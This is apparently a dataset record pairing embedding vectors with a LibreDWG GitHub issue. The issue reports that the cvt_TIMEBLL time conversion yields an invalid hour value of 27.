0.0051839593797922134, 0.03093767911195755, -0.01203659176826477, 0.02451605536043644, 0.007386450190097094, 0.005199776031076908, -0.02655642293393612, 0.00826428271830082, 0.00420331722125411, -0.03092186339199543, 0.0063860369846224785, 0.01168071385473013, 0.023155810311436653, 0.007746282499283552, 0.009324009530246258, -0.0026137277018278837, 0.011372285895049572, 0.003005193779245019, -0.0009475257829762995, 0.0028272548224776983, -0.004108416382223368, 0.019185790792107582, 0.003175224643200636, 0.011506728827953339, 0.009347734972834587, 0.0010528063867241144, 0.004764813929796219, 0.0011753867147490382, -0.019138339906930923, 0.016750002279877663, 0.021194525063037872, -0.03932058811187744, 0.0017981735290959477, -0.01727195642888546, 0.019755195826292038, -0.006595609709620476, 0.010771247558295727, 0.02326652780175209, -0.019834280014038086, -0.020008264109492302, -0.006820999085903168, 0.001683501643128693, -0.00004775934939971194, 0.025559963658452034, 0.029957037419080734, 0.008054709993302822, 0.008106115274131298, 0.01443283911794424, 0.0024179948959499598, 0.014345846138894558, 0.010494452901184559, 0.007987488992512226, -0.0030407817102968693, -0.004013515543192625, 0.012969783507287502, -0.003137659514322877, -0.02535434626042843, -0.009474269114434719, -0.015105052851140499, 0.029893770813941956, 0.013721082359552383, 0.029118746519088745, -0.0050653330981731415, -0.021067989990115166, -0.003663568524643779, 0.00962452869862318, 0.002253895392641425, 0.008541077375411987, 0.00420727115124464, -0.00922119989991188, -0.012534821406006813, -0.009529627859592438, 0.004669913090765476, 0.02567068301141262, 0.005361898336559534, -0.012178943492472172, 0.0019444790668785572, 0.007228281814604998, 0.00410050805658102, 0.030842779204249382, -0.005429119803011417, 0.031127480790019035, 0.0061250594444572926, -0.017825543880462646, -0.019043438136577606, 0.003734744153916836, -0.014780808240175247, 0.00843826774507761, -0.002760033356025815, -0.001036989619024098, 0.010502361692488194, -0.04004816338419914, 0.018157698214054108, -0.002730376785621047, -0.018379133194684982, 0.007544618099927902, 0.009584986604750156, 0.010019948706030846, -0.00582454027608037, 0.009521719068288803, -0.0029083159752190113, 0.001776425400748849, -0.01025720126926899, -0.07503494620323181, 0.007354816421866417, 0.003918614704161882, 0.005093012936413288, 0.011577905155718327, 0.000548151321709156, -0.007469488307833672, 0.010518178343772888, 0.008185199461877346, 0.0012831386411562562, -0.00023169154883362353, -0.013958334922790527, 0.008525260724127293, -0.000430019514169544, 0.0013325662584975362, 0.00985387247055769, -0.0005397486384026706, 0.019865913316607475, 0.0168607197701931, -0.0061606476083397865, -0.013562913984060287, 0.0006104300264269114, -0.016243863850831985, -0.003811851143836975, 0.00033857859671115875, -0.007596022915095091, 0.002060139551758766, -0.016243863850831985, -0.009308192878961563, -0.009577078744769096, 0.0005125635070726275, 0.013365204446017742, -0.014828259125351906, -0.013167493976652622, -0.005314447917044163, -0.026303354650735855, 0.007635565008968115, -0.012218485586345196, 0.005951074883341789, -0.001953375991433859, -0.009497994557023048, 0.0026453614700585604, 0.007283641025424004, -0.012329203076660633, -0.006453258451074362, 0.0032108123414218426, -0.004954615607857704, 0.005891761742532253, -0.008628069423139095, 0.018189331516623497, 0.0010725774336606264, 0.014788717031478882, 0.012811616063117981, -0.013199127279222012, 0.0027026974130421877, 0.02486402541399002, -0.008588527329266071, -0.006350449286401272, -0.02132106013596058, -0.015967069193720818, 0.017825543880462646, -0.012163126841187477, 0.02174811251461506, -0.005112783517688513, -0.008944406174123287, 0.001319715054705739, 0.007026617880910635, 0.012416196055710316, 0.01882200315594673, -0.0008373023592866957, -0.01886945404112339, -0.01205240935087204, 0.003457949962466955, -0.01405323576182127, 0.011522545479238033, 0.014100685715675354, -0.008596436120569706, -0.005788952577859163, 0.01591961830854416, -0.004088645335286856, 0.011767706833779812, -0.011743981391191483, 0.00017484989075455815, 0.008216832764446735, 0.0008086343877948821, -0.005840356927365065, 0.0012930241646245122, 0.015785176306962967, 0.007089884951710701, 0.0061408765614032745, 0.006310907192528248, -0.008881138637661934, -0.000242689173319377, 0.01141973678022623, 0.02089400589466095, -0.009300284087657928, -0.014535647816956043, 0.003426316427066922, 0.009932956658303738, 0.001725020818412304, -0.005820585880428553, -0.0016162802930921316, -0.0012673218734562397, -0.009845963679254055, -0.019454676657915115, -0.012479462660849094, -0.003388751531019807, -0.015215771272778511, 0.00691194599494338, -0.008509444072842598, 0.0176673773676157, 0.012400378473103046, 0.012131492607295513, 0.001073565916158259, 0.01467009074985981, 0.011593721807003021, -0.0012969784438610077, 0.00843035988509655, -0.02253895439207554, -0.0018861545249819756, -0.02168484590947628, -0.0028193462640047073, -0.005187913775444031, 0.007912359200417995, -0.015033877454698086, 0.003908729180693626, -0.025449246168136597, -0.004934844560921192, -0.01040746085345745, 0.011087583377957344, 0.025512514635920525, -0.008628069423139095, -0.0024753306061029434, -0.008216832764446735, 0.0014996313257142901, -0.023994101211428642, 0.005132554564625025, -0.021067989990115166, 0.02171647921204567, 0.006310907192528248, -0.012542730197310448, -0.006397899705916643, 0.018236782401800156, -0.020182250067591667, -0.015982886776328087, 0.0015915664844214916, -0.005168142728507519, 0.02204863354563713, 0.014045326970517635, -0.005567517131567001, 0.002671063644811511, 0.01382389198988676, -0.00019153168250340968, 0.012329203076660633, 0.00924492534250021, 0.0024516053963452578, 0.01842658407986164, 0.007010800763964653, 0.006235777400434017, 0.01086614839732647, -0.008030985482037067, 0.028375357389450073, -0.0014610778307542205, -0.0020186202600598335, -0.013902976177632809, -0.0063464948907494545, -0.008936497382819653, -0.007105701602995396, 0.010510270483791828, 0.014140227809548378, 0.01243992056697607, 0.0180311631411314, -0.01842658407986164, -0.002010711934417486, 0.012653447687625885, -0.0032226750627160072, -0.0313805490732193, -0.009268650785088539, 0.005369807127863169, -0.022665487602353096, 0.003659614361822605, -0.002244009869173169, -0.003329438390210271, 0.0011842836393043399, 0.0012426080647855997, -0.025860484689474106, -0.00028569111600518227, 0.022301701828837395, 0.013942517340183258, 0.018205147236585617, 0.013460105285048485, 0.05384042114019394, -0.00511673791334033, -0.00942681822925806, -0.008952314034104347, 0.01681326888501644, -0.006904037669301033, 0.009727338328957558, -0.01799952983856201, 0.0006840770365670323, 0.01145137008279562, 0.0074220378883183, -0.005931303836405277, 0.008968130685389042, 0.016307130455970764, -0.003287919331341982, -0.01565864123404026, 0.003246400272473693, 0.0028490028344094753, -0.003064506920054555, 0.0050851041451096535, -0.00660747243091464, 0.010146483778953552, -0.00752089312300086, -0.0063069527968764305, -0.010075307451188564, 0.005413303151726723, 0.006757732015103102, -0.00410050805658102, 0.024342069402337074, 0.022254250943660736, 0.006647014059126377, 0.024215536192059517, 0.005939212162047625, 0.004733180161565542, -0.01720868982374668, 0.006647014059126377, 0.007943992502987385, 0.0029261098243296146, 0.011459278874099255, 0.010676346719264984, -0.0208149217069149, 0.015120870433747768, 0.015342305414378643, -0.003924545831978321, 0.024009916931390762, 0.018616385757923126, -0.016188504174351692, 0.006461166776716709, -0.0028470256365835667, 0.017556658014655113, 0.01243992056697607, -0.005607059225440025, -0.009078849107027054, -0.012091951444745064, 0.03130146488547325, 0.04703919216990471, 0.00785304605960846, 0.020403685048222542, -0.01187842432409525, 0.02124197594821453, -0.02608191967010498, -0.015025969594717026, 0.026350805535912514, -0.00018597109010443091, -0.007686969358474016, 0.007975626736879349, 0.0012030660873278975, -0.0015194022562354803, -0.011641171760857105, 0.008319641463458538, 0.0028153921011835337, 0.026002835482358932, -0.00825637485831976, -0.023076726123690605, 0.007406221237033606, 0.008137748576700687, -0.022380786016583443, 0.01124575175344944, 0.00866761151701212, 0.011174576357007027, -0.009751062840223312, 0.0063069527968764305, 0.001941513386555016, 0.007497167680412531, 0.006295090075582266, -0.007374587468802929, 0.009031398221850395, -0.023503778502345085, -0.0010290811769664288, -0.0196444783359766, -0.01483616791665554, -0.005915486719459295, 0.0074220378883183, 0.007406221237033606, 0.005203730426728725, -0.02692021057009697, -0.0037940572947263718, -0.00572568504139781, -0.0038553474005311728, 0.019470492377877235, -0.005409348756074905, -0.01569027453660965, -0.007809549570083618, -0.032297924160957336, 0.011664897203445435, 0.00711756432428956, 0.011356469243764877, -0.00803493894636631, 0.0003015079419128597, 0.020735837519168854, 0.005211638752371073, -0.032772429287433624, 0.0032503544352948666, 0.004464294761419296, -0.016655100509524345, 0.006362311542034149, -0.0016419825842604041, 0.0023191396612674, 0.01266135647892952, 0.019027622416615486, 0.025196177884936333, -0.008533168584108353, -0.004015492741018534, 0.0007933118613436818, 0.00602620467543602, 0.004539424553513527, -0.02937181480228901, -0.0092765586450696, -0.01368154026567936, 0.012645539827644825, 0.0024516053963452578, -0.014946885406970978, -0.0035963470581918955, 0.011348561383783817, 0.00711361039429903, 0.0092765586450696, -0.003022987861186266, 0.007414129562675953, -0.0003524182830005884, 0.010597262531518936, 0.011807247996330261, -0.007880725897848606, 0.02285528928041458, -0.003155453596264124, 0.019533760845661163, -0.025512514635920525, -0.01345219649374485, -0.018157698214054108, 0.007026617880910635, 0.015911711379885674, 0.015982886776328087, -0.009956682100892067, 0.009505902417004108, 0.004515699110925198, -0.02687275968492031, 0.012700898572802544, 0.00345597299747169, 0.004096553660929203, 0.012337111867964268, -0.004523607436567545, 0.023076726123690605, 0.027410531416535378, 0.010114849545061588, 0.012953966856002808, -0.0008041859255172312, -0.004416844341903925, -0.023472145199775696, -0.013555006124079227, 0.008715062402188778, 0.008722970262169838, -0.016623467206954956, 0.012487371452152729, -0.041123706847429276, -0.0164178479462862, -0.008501535281538963, 0.01640203222632408, 0.0006222926313057542, 0.008572710677981377, -0.016196412965655327, -0.005073241889476776, -0.012044500559568405, 0.006065746303647757, 0.06775921583175659, 0.006560022011399269, -0.015524198301136494, -0.0004576989449560642, 0.00010361245949752629, -0.024753307923674583, -0.019391408190131187, 0.051594432443380356, -0.005994570907205343, 0.0229501910507679, 0.004428706597536802, -0.0005155291291885078, 0.013942517340183258, -0.015595374628901482, -0.007370633538812399, -0.023867566138505936, 0.029450898990035057, -0.007619747892022133, -0.012004958465695381, 0.01467009074985981, -0.015619099140167236, 0.002924132626503706, 0.016259679570794106, 0.007841183803975582, -0.019486309960484505, -0.004693638067692518, -0.012218485586345196, -0.021099623292684555, -0.003930477425456047, 0.028849860653281212, -0.018252598121762276, 0.01449610572308302, 0.0034955148585140705, -0.020182250067591667, -0.013800166547298431, 0.015532107092440128, 0.00683681620284915, 0.017540842294692993, -0.008216832764446735, 0.007390404120087624, 0.02125779166817665, -0.004685729742050171, -0.0009934933623299003, 0.02174811251461506, 0.012582272291183472, -0.00032795165316201746, -0.010533994995057583, 0.005488432943820953, 0.014306304045021534, -0.011736072599887848, 0.00841454230248928, 0.0029616975225508213, 0.00785304605960846, -0.008216832764446735, -0.003238491714000702, 0.0009890449000522494, 0.009956682100892067, 0.016987252980470657, -0.012898608110845089, 0.006413716357201338, -0.005947120487689972, -0.009150024503469467, -0.006967304740101099, 0.004155866801738739, 0.002253895392641425, 0.0008466935832984746, -0.03217139095067978, -0.010170208290219307, -0.015714000910520554, -0.005136508960276842, 0.005618921481072903, -0.02491147443652153, -0.005025791469961405, -0.00008736315794521943, 0.02484820783138275, -0.005717776715755463, 0.014946885406970978, 0.009679887443780899, -0.0038790726102888584, -0.009893414564430714, -0.007058251183480024, 0.013863434083759785, -0.02973560243844986, 0.005251180846244097, -0.009814330376684666, 0.0018169559771195054, -0.01081869751214981, -0.011119217611849308, -0.004064919892698526, 0.023219076916575432, -0.002700720215216279, 0.0017368834232911468, -0.016560200601816177, -0.013950426131486893, -0.018774552270770073, 0.0028865677304565907, 0.02886567823588848, 0.01731940731406212, -0.005567517131567001, -0.008382908999919891, 0.014828259125351906, 0.012076133862137794, -0.0074457633309066296, -0.02416808530688286, -0.008881138637661934, -0.00143043277785182, 0.012882791459560394, 0.01107176672667265, 0.013784349896013737, -0.01814188063144684, -0.011079675517976284, -0.0016360512236133218, -0.02122615836560726, 0.025465063750743866, -0.008928589522838593, 0.0009183635120280087, 0.001111130928620696, -0.002123406622558832, -0.007639518938958645, -0.004788539372384548, 0.0030625297222286463, -0.00018028692284133285, 0.0064295330084860325, 0.004563149530440569, -0.01588798500597477, 0.007022663485258818, 0.0006361323175951838, -0.0007320216973312199, 0.011941690929234028, 0.03808687627315521, 0.022776205092668533, -0.0063662659376859665, -0.0011437530629336834, 0.0015974977286532521, 0.009885505773127079, -0.0017309520626440644, 0.01769901067018509, -0.006647014059126377, -0.0022301701828837395, 0.016196412965655327, 0.021052174270153046, -0.014717541635036469, 0.023171626031398773, -0.010976865887641907, 0.012329203076660633, 0.012384561821818352, -0.004282401409000158, -0.016275497153401375, 0.041123706847429276, -0.01205240935087204, 0.004337760154157877, 0.005650555249303579, -0.004772722255438566, 0.00843035988509655, 0.008454084396362305, -0.007240144535899162, -0.01962866075336933, 0.01967611163854599, 0.018015345558524132, -0.0004468248807825148, 0.02013479918241501, 0.007303412072360516, 0.008062618784606457, 0.008715062402188778, 0.005634738598018885, -0.03289896249771118, 0.004824127070605755, 0.001968204276636243, 0.01364990696310997, -0.002396246651187539, -0.005539837758988142, -0.00029928371077403426, 0.008778329007327557, 0.0019128454150632024, -0.010533994995057583, 0.02087818831205368, -0.01345219649374485, -0.01842658407986164, -0.006741915363818407, -0.0012752303155139089, -0.010905690491199493, 0.0066114263609051704, 0.005132554564625025, 0.03976345807313919, 0.010130666196346283, 0.008794146589934826, 0.015698183327913284, 0.013483830727636814, -0.009497994557023048, -0.0034856293350458145, 0.018157698214054108, 0.04109207168221474, -0.004764813929796219, -0.010454910807311535, -0.027062561362981796, 0.0016400055028498173, 0.01205240935087204, -0.006864495575428009, -0.008327550254762173, 0.007481351029127836, 0.015516290441155434, -0.01544511504471302, 0.017477573826909065, 0.03096931427717209, 0.0003922074392903596, 0.03133310005068779, 0.010217659175395966, 0.00413214135915041, -0.02283947356045246, -0.014804533682763577, 0.0026374529115855694 ]
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
- _obj->TDCREATE {days=2454762 ms=99310234 value=2454762.9931023400 } _dwg_time_bll days 2454762 unsigned int ms 99310234 unsigned int value 2454762.9931023400 double - tm {tm_sec=10 tm_min=35 tm_hour=27 ...} tm tm_sec 10 int tm_min 35 int tm_hour 27 int tm_mday 22 int tm_mon 9 int tm_year 108 int tm_hour = 27 is invalid
BUG of cvt_TIMEBLL
https://api.github.com/repos/LibreDWG/libredwg/issues/639/comments
5
2023-02-13T02:21:21
2023-02-17T11:19:44Z
https://github.com/LibreDWG/libredwg/issues/639
1,581,530,058
639
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : BUG of cvt_TIMEBLL Issue date: --- start body --- - _obj->TDCREATE {days=2454762 ms=99310234 value=2454762.9931023400 } _dwg_time_bll days 2454762 unsigned int ms 99310234 unsigned int value 2454762.9931023400 double - tm {tm_sec=10 tm_min=35 tm_hour=27 ...} tm tm_sec 10 int tm_min 35 int tm_hour 27 int tm_mday 22 int tm_mon 9 int tm_year 108 int tm_hour = 27 is invalid --- end body ---
482
[ 0.0006223599775694311, -0.024106625467538834, -0.0028154149185866117, 0.012542275711894035, 0.026698904111981392, 0.02694726549088955, -0.007388766389340162, 0.0591101311147213, -0.036043521016836166, 0.006042179185897112, 0.010338064283132553, 0.007043388206511736, 0.012394811026751995, -0.027133537456393242, -0.017788920551538467, 0.057619959115982056, -0.016283227130770683, 0.011145239695906639, -0.002390483161434531, 0.0009594918228685856, 0.00510694133117795, 0.02160748466849327, 0.013962594792246819, 0.07221122086048126, -0.02553470805287361, 0.005409632343798876, 0.0018142060143873096, -0.00561530701816082, 0.020381197333335876, -0.011541066691279411, -0.007400408387184143, 0.027428466826677322, 0.030393287539482117, -0.0035507988650351763, 0.012216300703585148, -0.022119730710983276, 0.04321496933698654, 0.08158688247203827, -0.017462946474552155, 0.008467588573694229, -0.04765443876385689, -0.04026567190885544, -0.018006237223744392, -0.003966028802096844, 0.008855653926730156, -0.006581590045243502, 0.011471214704215527, 0.020769262686371803, -0.004008715972304344, 0.005297093652188778, 0.005735607352107763, -0.014327377080917358, -0.029011772945523262, -0.00890998262912035, -0.002128539141267538, -0.0027766083367168903, 0.03523634374141693, 0.021048670634627342, -0.01570112816989422, 0.0160814318805933, -0.011339272372424603, 0.024727530777454376, -0.027288762852549553, 0.015483811497688293, 0.00811832956969738, 0.005642471835017204, -0.0359814278781414, 0.025565752759575844, -0.0321628637611866, 0.00036647930392064154, -0.012084358371794224, -0.022678544744849205, 0.05091418698430061, 0.017121447250247, 0.03874445706605911, -0.04725085198879242, 0.031976595520973206, 0.02362542599439621, -0.01594172976911068, 0.007567276246845722, -0.022430183365941048, 0.01898416317999363, -0.018906548619270325, 0.011797189712524414, -0.008661621250212193, 0.007493543904274702, 0.010858071967959404, -0.07134195417165756, -0.04184897989034653, -0.008521917276084423, 0.0032733322586864233, 0.01853400655090809, -0.009740442968904972, -0.024696486070752144, -0.02027253992855549, -0.0017763696378096938, -0.016609201207756996, -0.005634710658341646, -0.04017253592610359, -0.020334629341959953, -0.0028794456738978624, 0.003832146292552352, 0.012363765388727188, 0.006104269530624151, 0.03855818510055542, 0.006162479519844055, 0.050231192260980606, 0.0029784024227410555, 0.03591933846473694, 0.08363586664199829, -0.008025193586945534, 0.020381197333335876, -0.0195584986358881, -0.02230600267648697, -0.03793727979063988, 0.04066925868391991, 0.03365303575992584, -0.021390167996287346, 0.010539857670664787, 0.026435019448399544, -0.029881039634346962, -0.018673710525035858, 0.0011321810306981206, -0.040638215839862823, -0.011541066691279411, 0.025612320750951767, 0.003595426445826888, -0.026279792189598083, -0.013062283396720886, 0.004404542967677116, -0.024975892156362534, -0.014948281459510326, 0.002384662162512541, -0.023951400071382523, 0.006030537188053131, -0.002887207083404064, -0.02364094741642475, 0.02466544136404991, -0.015196643769741058, -0.013869459740817547, -0.040948666632175446, -0.031247030943632126, 0.004012596793472767, -0.005898594856262207, -0.02565888874232769, -0.005114702973514795, -0.011432408355176449, -0.004423946142196655, 0.03433603048324585, 0.026574723422527313, -0.00449379812926054, -0.03958267718553543, 0.02536395750939846, 0.013217509724199772, 0.026916220784187317, -0.026357406750321388, -0.01087359432131052, 0.015196643769741058, -0.0031472109258174896, -0.06156270578503609, -0.013621097430586815, -0.017214583232998848, -0.0011612859088927507, -0.03983103856444359, -0.049920741468667984, 0.024091104045510292, 0.04315287992358208, 0.04622635617852211, 0.012922579422593117, 0.028918638825416565, -0.0004339056904427707, 0.007540111895650625, 0.0204277653247118, 0.022694068029522896, -0.0188599806278944, 0.0017036073841154575, -0.016919653862714767, 0.03806145861744881, -0.013085567392408848, -0.02187136933207512, 0.018223553895950317, 0.005607545841485262, -0.006201285868883133, 0.027661306783556938, 0.010105224326252937, -0.032380182296037674, 0.02423080801963806, -0.020800309255719185, 0.0028678036760538816, -0.006752339191734791, -0.0011283003259450197, 0.002270182827487588, 0.04420841857790947, -0.01985342800617218, -0.0028231763280928135, -0.021809278056025505, 0.0029007892590016127, -0.032690633088350296, -0.02595381811261177, -0.007031746208667755, -0.010407915338873863, 0.02769235149025917, -0.02953954227268696, -0.011137478984892368, -0.00540575198829174, -0.009507603943347931, -0.05047955363988876, 0.0282511655241251, -0.015483811497688293, -0.032100774347782135, 0.014862907119095325, -0.0301604475826025, 0.032380182296037674, -0.00582874333485961, -0.01116076298058033, 0.013023477047681808, 0.015274256467819214, 0.019030729308724403, 0.022942429408431053, -0.051224641501903534, 0.0239048320800066, -0.03452230244874954, 0.012860489077866077, -0.016329795122146606, -0.041817933320999146, 0.01825459860265255, 0.03666442632675171, 0.013349452055990696, -0.027490556240081787, -0.015499334782361984, 0.03942745178937912, -0.014133344404399395, -0.03626083582639694, -0.01709040254354477, 0.003341243602335453, -0.01929461397230625, 0.009662830270826817, -0.028344301506876945, -0.03809250518679619, -0.024106625467538834, 0.01682651787996292, 0.03346676379442215, 0.004749921150505543, -0.03520529717206955, -0.01102105900645256, 0.005192315671592951, 0.011967938393354416, 0.008343406952917576, 0.005425155162811279, 0.03377721831202507, 0.04101075604557991, -0.006034418009221554, -0.006907565053552389, 0.013450348749756813, 0.013085567392408848, -0.018223553895950317, 0.027909668162465096, 0.058892812579870224, -0.004229913465678692, -0.009787010960280895, 0.011641963385045528, 0.0452018640935421, -0.05184554681181908, 0.015344108454883099, 0.012914818711578846, 0.005669636186212301, -0.04014148935675621, -0.015111269429326057, -0.014839623123407364, -0.04706458002328873, 0.0047149951569736, -0.023113178089261055, -0.005906356498599052, 0.017773397266864777, -0.0037002041935920715, 0.0023730203974992037, -0.025643365457654, 0.002623322419822216, 0.011090910993516445, 0.0050642541609704494, -0.020210448652505875, 0.042997654527425766, 0.010322540998458862, 0.031215986236929893, 0.025146640837192535, 0.0023594379890710115, 0.01794414594769478, -0.03989312797784805, -0.019061775878071785, -0.03147986903786659, -0.006752339191734791, 0.014870668761432171, -0.03532947972416878, -0.00977924931794405, -0.003775876946747303, -0.0057239653542637825, 0.005475603509694338, -0.05755786970257759, -0.010842548683285713, -0.031200462952256203, -0.029648201540112495, -0.009825817309319973, -0.0004676188691519201, -0.035143207758665085, -0.002169285900890827, 0.015212166123092175, 0.006212927866727114, -0.01304676104336977, -0.007070552557706833, -0.019325660541653633, 0.006333228200674057, -0.01681099645793438, 0.007722502574324608, 0.005762772168964148, 0.002066448563709855, -0.0162521805614233, 0.0006951222312636673, -0.030750306323170662, -0.009802533313632011, -0.010780458338558674, -0.03134016692638397, 0.005343661177903414, -0.03231809288263321, -0.004323048982769251, 0.06209047511219978, 0.006608754862099886, -0.030796874314546585, 0.03352885693311691, -0.03157300502061844, -0.0033431840129196644, -0.02157643996179104, -0.01912386529147625, -0.023408109322190285, -0.00648457370698452, -0.002852281089872122, -0.032411228865385056, -0.010547619313001633, 0.0021731664892286062, -0.018782367929816246, -0.008211465552449226, 0.01390050444751978, 0.0420662946999073, -0.018440870568156242, -0.030501944944262505, 0.015243210829794407, -0.005669636186212301, 0.049796558916568756, -0.00594516284763813, 0.0022566006518900394, 0.004454991314560175, 0.0009425139869563282, -0.0004552493046503514, 0.004606336820870638, 0.02579859085381031, 0.0137763237580657, -0.006469051353633404, -0.015056939795613289, -0.04017253592610359, 0.011277182027697563, -0.014637828804552555, -0.004226032644510269, 0.0045636496506631374, 0.0408555306494236, 0.03852713853120804, -0.012224062345921993, -0.0007121001253835857, 0.038465049117803574, 0.012728546746075153, -0.011905848048627377, -0.019542977213859558, 0.009398945607244968, 0.04566754400730133, -0.007497424725443125, -0.00897207297384739, -0.04281138256192207, -0.0017627873457968235, 0.02274063602089882, 0.015770981088280678, 0.0038961772806942463, 0.009624022990465164, -0.03871341049671173, -0.03827877715229988, 0.018223553895950317, -0.042997654527425766, 0.055136341601610184, 0.011238375678658485, -0.02232152596116066, 0.014490364119410515, 0.009243719279766083, -0.03059508092701435, 0.0070007010363042355, -0.006934729870408773, 0.01710592582821846, -0.06302183121442795, -0.00396408885717392, 0.04237674921751022, 0.01255003735423088, 0.0014426333364099264, 0.04622635617852211, -0.009453274309635162, 0.01433513779193163, 0.023578858003020287, 0.008731473237276077, -0.03983103856444359, -0.003570202272385359, 0.046133220195770264, -0.03147986903786659, -0.03126255422830582, 0.055136341601610184, 0.031091803684830666, 0.0008513185894116759, -0.0023730203974992037, -0.0029085506685078144, -0.01259660441428423, 0.0008910953183658421, -0.012130926363170147, -0.012487946078181267, -0.0012592724524438381, -0.034304987639188766, 0.0001792377297533676, 0.007020104210823774, -0.008715949952602386, -0.02510007470846176, 0.015972774475812912, 0.01137031801044941, 0.013233032077550888, -0.0056579941883683205, 0.02360990270972252, 0.030781352892518044, -0.019496409222483635, -0.018953116610646248, 0.0325043611228466, 0.04156957194209099, 0.05724741518497467, 0.006368154194205999, -0.010780458338558674, -0.003230644855648279, -0.03740951046347618, 0.00045961502473801374, 0.0019141328521072865, -0.01766473986208439, 0.05439125373959541, 0.003853490110486746, -0.0119524160400033, 0.012876012362539768, -0.01592620648443699, -0.06668516993522644, -0.011471214704215527, 0.021948982030153275, -0.007846683263778687, -0.03169718757271767, 0.01535186916589737, 0.03855818510055542, 0.00655830604955554, 0.004559769295156002, 0.023237358778715134, -0.007633247412741184, -0.015693366527557373, 0.03588829189538956, 0.0014465140411630273, -0.014164389111101627, 0.014552454464137554, -0.02910490892827511, 0.0042609586380422115, 0.03700592368841171, 0.02117285132408142, 0.05752682313323021, -0.021793756633996964, 0.0059800888411700726, 0.012449139729142189, -0.0038631916977465153, 0.01927909255027771, -0.004652904812246561, -0.0015347988810390234, -0.009585216641426086, 0.026605768129229546, -0.03843400254845619, 0.00691920705139637, -0.020846877247095108, -0.030393287539482117, 0.01261988840997219, -0.043711692094802856, 0.005432916339486837, 0.009127299301326275, 0.0055066486820578575, 0.03467752784490585, 0.008754756301641464, -0.03234913572669029, -0.02421528473496437, 0.043432287871837616, 0.007144284900277853, 0.04824429750442505, 0.006930849049240351, -0.03234913572669029, -0.005937401670962572, 0.0178199652582407, -0.006146956700831652, 0.019232524558901787, 0.03942745178937912, -0.00775742856785655, -0.002914371667429805, 0.018596095964312553, 0.002991984598338604, 0.03588829189538956, 0.018502961844205856, -0.024448124691843987, -0.00695025222375989, -0.021545393392443657, -0.005611426662653685, -0.036912787705659866, 0.018301166594028473, -0.05504320561885834, 0.005056492984294891, -0.008584007620811462, -0.0030890011694282293, -0.010167314670979977, -0.01079598069190979, -0.020241495221853256, -0.014552454464137554, 0.029648201540112495, 0.003304377431049943, -0.01536739245057106, -0.0051690321415662766, 0.02781653217971325, 0.024991415441036224, 0.030222538858652115, 0.00005199470979277976, 0.030331196263432503, 0.0314643457531929, -0.013178703375160694, -0.00037521080230362713, -0.001024492783471942, -0.01238704938441515, 0.021421212702989578, -0.006364273373037577, 0.014653352089226246, -0.025860682129859924, 0.03939640522003174, -0.0029609394259750843, 0.010508812963962555, 0.01785101182758808, 0.033559899777173996, -0.048741020262241364, 0.013799607753753662, -0.012076596729457378, -0.014676636084914207, -0.004699472803622484, 0.03099866956472397, -0.021498827263712883, -0.02534843608736992, -0.0038709528744220734, -0.022259434685111046, -0.00513798650354147, -0.0016667410964146256, -0.009321331977844238, 0.03300108760595322, -0.01837877929210663, 0.006042179185897112, 0.01741637848317623, 0.013163180090487003, 0.009476558305323124, 0.0034576633479446173, 0.004940073471516371, -0.01160315703600645, -0.0004188681486994028, -0.010027611628174782, -0.00812609028071165, 0.034273941069841385, -0.019061775878071785, -0.027490556240081787, 0.02045881189405918, -0.02190241403877735, 0.004924550652503967, -0.0027475033421069384, -0.024106625467538834, 0.001801593927666545, -0.01303123775869608, -0.010182837955653667, -0.00470335315912962, -0.010827026329934597, 0.017493991181254387, -0.02419976145029068, 0.02173166535794735, 0.017571603879332542, -0.018052805215120316, 0.0008193032117560506, -0.03396349027752876, -0.04290451854467392, 0.009057448245584965, 0.0019985372200608253, 0.015398437157273293, 0.014381705783307552, 0.019899995997548103, 0.01081150397658348, 0.04188002273440361, -0.006930849049240351, -0.019605066627264023, 0.0014911415055394173, 0.05495006963610649, 0.01035358663648367, -0.005448439158499241, 0.01870475523173809, 0.010120747610926628, 0.0032325852662324905, -0.041383299976587296, 0.008809085935354233, 0.014141105115413666, -0.010889116674661636, -0.026466064155101776, 0.015491573140025139, 0.018487438559532166, 0.032255999743938446, 0.01595725119113922, 0.008273555897176266, 0.037316374480724335, 0.011929132044315338, 0.010470005683600903, 0.048741020262241364, -0.027335330843925476, -0.029508497565984726, 0.004874102305620909, -0.024370510131120682, 0.008343406952917576, -0.0017802503425627947, -0.011991222389042377, 0.03057955764234066, 0.013815130107104778, 0.009678352624177933, -0.013644381426274776, -0.028809979557991028, -0.009251480922102928, 0.00037521080230362713, -0.002254660241305828, -0.004008715972304344, 0.017307719215750694, 0.03967581316828728, -0.00044845815864391625, -0.044705141335725784, -0.002180927898734808, 0.02607799880206585, -0.008250271901488304, -0.0033684081863611937, -0.018052805215120316, 0.004268720280379057, -0.0033490050118416548, 0.005607545841485262, 0.01651606522500515, 0.030098356306552887, 0.018906548619270325, 0.034242894500494, -0.046009041368961334, 0.0028910876717418432, 0.025037983432412148, 0.022368093952536583, 0.01813041791319847, 0.0027901907451450825, 0.022119730710983276, 0.0373784638941288, 0.016950698569417, 0.02027253992855549, -0.03421185165643692, 0.00029371705022640526, -0.0011021059472113848, -0.029384316876530647, 0.018580574542284012, -0.01255003735423088, 0.01528201811015606, -0.00546784233301878, 0.015111269429326057, 0.004012596793472767, -0.0003165158850606531, -0.0028289970941841602, 0.010167314670979977, 0.00003538065720931627, -0.027443990111351013, -0.0075362310744822025, -0.005522171501070261, -0.008638337254524231, -0.016127999871969223, -0.02145225927233696, 0.02519320882856846, 0.0030792993493378162, -0.00316855451092124, 0.005110822152346373, 0.010695083998143673, -0.0005204927874729037, -0.012394811026751995, -0.005192315671592951, 0.015499334782361984, -0.020660605281591415, 0.037751007825136185, 0.013869459740817547, 0.025767546147108078, 0.004548127297312021, -0.007617725059390068, 0.003898117458447814, 0.012231823056936264, -0.0065078577026724815, -0.02536395750939846, -0.01650054380297661, -0.02811146154999733, 0.018596095964312553, -0.005006044637411833, 0.01348139438778162, -0.02333049476146698, 0.004815892316401005, 0.001289347535930574, -0.020784785971045494, 0.030207015573978424, -0.014234241098165512, -0.016283227130770683, -0.013000193051993847, -0.036043521016836166, -0.016904130578041077, -0.003381990361958742, 0.006860997527837753, -0.004268720280379057, 0.05097628012299538, -0.018922071903944016, -0.003727368777617812, -0.0032364658545702696, -0.01587187685072422, 0.0009759846143424511, -0.03073478490114212, 0.03042433224618435, 0.02117285132408142, 0.01267421804368496, -0.009577455930411816, -0.02739742211997509, 0.021514348685741425, -0.03188345953822136, -0.0031995996832847595, 0.02289586141705513, 0.007540111895650625, -0.0029298942536115646, 0.01035358663648367, 